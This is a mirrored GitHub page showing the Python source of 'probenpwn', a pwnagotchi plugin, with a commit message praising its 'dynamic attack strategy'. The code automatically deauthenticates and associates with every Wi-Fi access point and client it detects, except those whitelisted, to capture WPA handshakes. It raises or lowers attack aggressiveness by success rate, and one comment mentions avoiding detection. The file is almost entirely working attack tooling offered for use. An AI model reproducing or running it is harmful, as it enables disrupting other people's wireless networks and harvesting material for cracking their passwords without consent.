mirror of
https://github.com/AlienMajik/pwnagotchi_plugins.git
synced 2025-07-01 18:37:27 -04:00

Dynamic Attack Strategy: The plugin now adjusts the aggressiveness of its attacks based on real-time performance, leading to better handling of different APs and more successful attacks. Enhanced Logging and Feedback: The plugin logs success and failure rates for handshakes, providing clear insight into its effectiveness. The added performance stats help in tuning attack strategies over time. Improved Robustness: The watchdog is more resilient, with checks for additional errors (e.g., missing wifi.interface) and the ability to restart the service when necessary. Adaptability: By adjusting the attack parameters based on success rates, the plugin can adapt its behavior, making it more intelligent and resource-efficient. Overall, this version is more intelligent and self-correcting. It can now analyze its own performance and adjust its strategies dynamically, leading to better overall efficiency and fewer failed attacks over time. It’s also more robust in dealing with errors, ensuring smoother operation in case of interface or service failures.
261 lines
12 KiB
Python
261 lines
12 KiB
Python
import logging
|
||
import time
|
||
import threading
|
||
import os
|
||
import subprocess
|
||
import random
|
||
import pwnagotchi.plugins as plugins
|
||
|
||
class probenpwn(plugins.Plugin):
|
||
__author__ = 'AlienMajik'
|
||
__version__ = '1.1.0'
|
||
__license__ = 'GPL3'
|
||
__description__ = (
|
||
'Pwn more aggressively. Launch immediate associate or deauth attack '
|
||
'when bettercap spots a device, with enhanced performance for more handshakes. '
|
||
'Enhanced with dynamic parameter tuning, randomization, and feedback loop.'
|
||
)
|
||
|
||
def __init__(self):
|
||
logging.debug("ProbeNpwn plugin created")
|
||
self._agent = None
|
||
self.old_name = None
|
||
self.recents = {}
|
||
self.whitelist = set()
|
||
self.attack_threads = []
|
||
self.epoch_duration = 60 # default epoch duration in seconds
|
||
self._watchdog_thread = None
|
||
# Track number of attack attempts per AP MAC address
|
||
self.attack_attempts = {}
|
||
# Optionally, track the number of successful handshakes per AP
|
||
self.success_counts = {}
|
||
# Track the total number of successful and failed handshakes for feedback loop
|
||
self.total_handshakes = 0
|
||
self.failed_handshakes = 0
|
||
# Track the performance of each AP for dynamic adjustments
|
||
self.performance_stats = {}
|
||
|
||
def on_unload(self, ui):
|
||
if self.old_name:
|
||
ui.set('name', "%s " % self.old_name)
|
||
else:
|
||
ui.set('name', "%s> " % ui.get('name')[:-3])
|
||
self.old_name = None
|
||
logging.info("Probing out.")
|
||
|
||
def on_ui_setup(self, ui):
|
||
self._ui = ui
|
||
|
||
def on_ui_update(self, ui):
|
||
if self.old_name is None:
|
||
self.old_name = ui.get('name')
|
||
if self.old_name:
|
||
i = self.old_name.find('>')
|
||
if i:
|
||
ui.set('name', "%s%s" % (self.old_name[:i], "!!!"))
|
||
|
||
def on_ready(self, agent):
|
||
self._agent = agent
|
||
logging.info("Probed and Pwnd!")
|
||
agent.run("wifi.clear")
|
||
if self._ui:
|
||
self._ui.set("status", "Probe engaged... \nPWNing your signals, Earthlings!")
|
||
self._watchdog_thread = threading.Thread(target=self._watchdog, daemon=True)
|
||
self._watchdog_thread.start()
|
||
|
||
def _watchdog(self):
|
||
CHECK_INTERVAL = 5 # seconds between checks
|
||
while True:
|
||
# Check for wlan0mon interface missing
|
||
if not os.path.exists("/sys/class/net/wlan0mon"):
|
||
logging.error("wlan0mon interface missing! This likely indicates a Wi‑Fi adapter crash. "
|
||
"Executing 'sudo systemctl restart pwnagotchi' to recover.")
|
||
try:
|
||
subprocess.run(["sudo", "systemctl", "restart", "pwnagotchi"], check=True)
|
||
logging.info("pwnagotchi service restarted successfully.")
|
||
except Exception as e:
|
||
logging.error("Failed to execute restart command: %s", e)
|
||
break # Stop checking after issuing the recovery command.
|
||
|
||
# Check for 'wifi.interface not set or not found' error in logs
|
||
try:
|
||
with open('/etc/pwnagotchi/log/pwnagotchi-debug.log', 'r') as log_file:
|
||
logs = log_file.read()
|
||
if "error 400: wifi.interface not set or not found" in logs:
|
||
logging.error("wifi.interface not set or not found! Restarting pwnagotchi to recover.")
|
||
try:
|
||
subprocess.run(["sudo", "systemctl", "restart", "pwnagotchi"], check=True)
|
||
logging.info("pwnagotchi service restarted successfully.")
|
||
except Exception as e:
|
||
logging.error("Failed to restart pwnagotchi service: %s", e)
|
||
break # Stop checking after issuing the recovery command.
|
||
except Exception as e:
|
||
logging.error("Error in watchdog: %s", repr(e))
|
||
|
||
time.sleep(CHECK_INTERVAL)
|
||
|
||
def track_recent(self, ap, cl=None):
|
||
ap['_track_time'] = time.time()
|
||
self.recents[ap['mac'].lower()] = ap
|
||
if cl:
|
||
cl['_track_time'] = ap['_track_time']
|
||
self.recents[cl['mac'].lower()] = cl
|
||
|
||
def ok_to_attack(self, ap):
|
||
if not self._agent:
|
||
return False
|
||
if ap.get('hostname', '').lower() in self.whitelist or ap['mac'].lower() in self.whitelist:
|
||
return False
|
||
return True
|
||
|
||
def attack_target(self, agent, ap, cl):
|
||
if not self.ok_to_attack(ap):
|
||
return
|
||
ap_mac = ap['mac'].lower()
|
||
self.attack_attempts[ap_mac] = self.attack_attempts.get(ap_mac, 0) + 1
|
||
logging.debug(f"Launching attack on AP {ap['mac']} and client {cl['mac'] if cl else 'N/A'}; attempt {self.attack_attempts[ap_mac]}")
|
||
|
||
# Adjust attack parameters dynamically based on performance feedback
|
||
self.adjust_attack_parameters(ap_mac)
|
||
|
||
if cl:
|
||
delay = self.dynamic_attack_delay(ap, cl)
|
||
agent.deauth(ap, cl, delay)
|
||
agent.associate(ap, 0.2)
|
||
|
||
def dynamic_attack_delay(self, ap, cl):
|
||
signal = cl.get('signal', -100) if cl is not None else -100
|
||
if signal < -60:
|
||
base_delay = 0.5
|
||
else:
|
||
base_delay = 0.25
|
||
|
||
ap_mac = ap['mac'].lower()
|
||
attempts = self.attack_attempts.get(ap_mac, 0)
|
||
if attempts > 10:
|
||
base_delay *= 0.6
|
||
elif attempts > 5:
|
||
base_delay *= 0.8
|
||
|
||
randomized_delay = base_delay * random.uniform(0.9, 1.1)
|
||
logging.debug(f"Dynamic attack delay for AP {ap['mac']} (signal {signal} dBm, {attempts} attempts): {randomized_delay:.3f}s")
|
||
return randomized_delay
|
||
|
||
def adjust_attack_parameters(self, ap_mac):
|
||
"""Adjust attack parameters based on performance metrics (success/failure rate)"""
|
||
if ap_mac not in self.performance_stats:
|
||
self.performance_stats[ap_mac] = {'success_rate': 0, 'failure_rate': 0, 'last_success': 0}
|
||
|
||
success_count = self.success_counts.get(ap_mac, 0)
|
||
attack_count = self.attack_attempts.get(ap_mac, 0)
|
||
|
||
# Calculate success rate
|
||
if attack_count > 0:
|
||
success_rate = (success_count / attack_count) * 100
|
||
else:
|
||
success_rate = 0
|
||
|
||
# Update performance stats
|
||
self.performance_stats[ap_mac]['success_rate'] = success_rate
|
||
self.performance_stats[ap_mac]['failure_rate'] = 100 - success_rate
|
||
|
||
# Dynamically adjust attack tactics based on success rate
|
||
if success_rate < 20: # Success rate below 20% indicates a need for more aggressive tactics
|
||
logging.info(f"Low success rate ({success_rate:.2f}%) on AP {ap_mac}. Making attack more aggressive.")
|
||
# Increase the attack frequency
|
||
self.attack_attempts[ap_mac] += 5 # Increase attempts
|
||
elif success_rate > 80: # Success rate above 80% means the attack is effective
|
||
logging.info(f"High success rate ({success_rate:.2f}%) on AP {ap_mac}. Reducing attack aggressiveness.")
|
||
# Slow down the attack to avoid detection
|
||
self.attack_attempts[ap_mac] = max(1, self.attack_attempts[ap_mac] - 2) # Reduce attempts
|
||
else:
|
||
logging.info(f"Moderate success rate ({success_rate:.2f}%) on AP {ap_mac}. Maintaining current attack tactics.")
|
||
|
||
def on_bcap_wifi_ap_new(self, agent, event):
|
||
try:
|
||
ap = event['data']
|
||
if agent._config['personality']['associate'] and self.ok_to_attack(ap):
|
||
logging.debug("insta-associate: %s (%s)", ap.get('hostname', 'Unknown AP'), ap['mac'])
|
||
attack_thread = threading.Thread(target=self.attack_target, args=(agent, ap, None))
|
||
attack_thread.start()
|
||
self.attack_threads.append(attack_thread)
|
||
except Exception as e:
|
||
logging.error("Error in on_bcap_wifi_ap_new: %s", repr(e))
|
||
|
||
def on_bcap_wifi_client_new(self, agent, event):
|
||
try:
|
||
ap = event['data']['AP']
|
||
cl = event['data']['Client']
|
||
if (agent._config['personality']['deauth'] and
|
||
self.ok_to_attack(ap) and
|
||
self.ok_to_attack(cl)):
|
||
logging.debug("insta-deauth: %s (%s) -> '%s' (%s) (%s)",
|
||
ap.get('hostname', 'Unknown AP'), ap['mac'],
|
||
cl.get('hostname', 'Unknown Client'), cl['mac'], cl['vendor'])
|
||
attack_thread = threading.Thread(target=self.attack_target, args=(agent, ap, cl))
|
||
attack_thread.start()
|
||
self.attack_threads.append(attack_thread)
|
||
except Exception as e:
|
||
logging.error("Error in on_bcap_wifi_client_new: %s", repr(e))
|
||
|
||
def on_handshake(self, agent, filename, ap, cl):
|
||
ap_mac = ap['mac'].lower()
|
||
logging.info("Handshake detected from %s", ap['mac'])
|
||
if ap_mac in self.attack_attempts:
|
||
del self.attack_attempts[ap_mac]
|
||
self.success_counts[ap_mac] = self.success_counts.get(ap_mac, 0) + 1
|
||
self.total_handshakes += 1
|
||
|
||
if 'mac' in ap and 'mac' in cl:
|
||
logging.info("Captured handshake from %s (%s) -> '%s' (%s) (%s)",
|
||
ap.get('hostname', 'Unknown AP'), ap['mac'], cl.get('hostname', 'Unknown Client'), cl['mac'], cl['vendor'])
|
||
if ap_mac in self.recents:
|
||
del self.recents[ap_mac]
|
||
cl_mac = cl['mac'].lower()
|
||
if cl_mac in self.recents:
|
||
del self.recents[cl_mac]
|
||
|
||
# Expanded Feedback Loop: Tracking success/failure rates
|
||
handshake_rate = (self.success_counts.get(ap_mac, 0) / self.attack_attempts.get(ap_mac, 1)) * 100
|
||
logging.info(f"Success rate for {ap['mac']}: {handshake_rate:.2f}%")
|
||
failure_rate = 100 - handshake_rate
|
||
logging.info(f"Failure rate for {ap['mac']}: {failure_rate:.2f}%")
|
||
|
||
def on_epoch(self, agent, epoch, epoch_data):
|
||
for mac in list(self.recents):
|
||
if self.recents[mac]['_track_time'] < (time.time() - (self.epoch_duration * 2)):
|
||
del self.recents[mac]
|
||
|
||
def on_bcap_wifi_ap_updated(self, agent, event):
|
||
try:
|
||
ap = event['data']
|
||
if self.ok_to_attack(ap):
|
||
logging.debug("AP updated: %s (%s)", ap.get('hostname', 'Unknown AP'), ap['mac'])
|
||
self.track_recent(ap)
|
||
except Exception as e:
|
||
logging.error("Error in on_bcap_wifi_ap_updated: %s", repr(e))
|
||
|
||
def on_bcap_wifi_client_updated(self, agent, event):
|
||
try:
|
||
ap = event['data']['AP']
|
||
cl = event['data']['Client']
|
||
if self.ok_to_attack(ap) and self.ok_to_attack(cl):
|
||
logging.debug("Client updated: %s (%s) -> '%s' (%s) (%s)",
|
||
ap.get('hostname', 'Unknown AP'), ap['mac'], cl.get('hostname', 'Unknown Client'), cl['mac'], cl['vendor'])
|
||
self.track_recent(ap, cl)
|
||
except Exception as e:
|
||
logging.error("Error in on_bcap_wifi_client_updated: %s", repr(e))
|
||
|
||
def sanitize_channel_list(self, channels):
|
||
"""
|
||
Sanitize the channel list to ensure only valid channels are included.
|
||
Channels for 2.4 GHz should be between 1 and 14, and for 5 GHz, it should be between 36 and 165.
|
||
"""
|
||
valid_channels = [ch for ch in channels if 1 <= ch <= 14 or 36 <= ch <= 165]
|
||
if not valid_channels:
|
||
logging.error("No valid channels to scan.")
|
||
return [] # Return an empty list if no valid channels are found
|
||
logging.debug(f"Scanning the following valid channels: {valid_channels}")
|
||
return valid_channels
|
||
|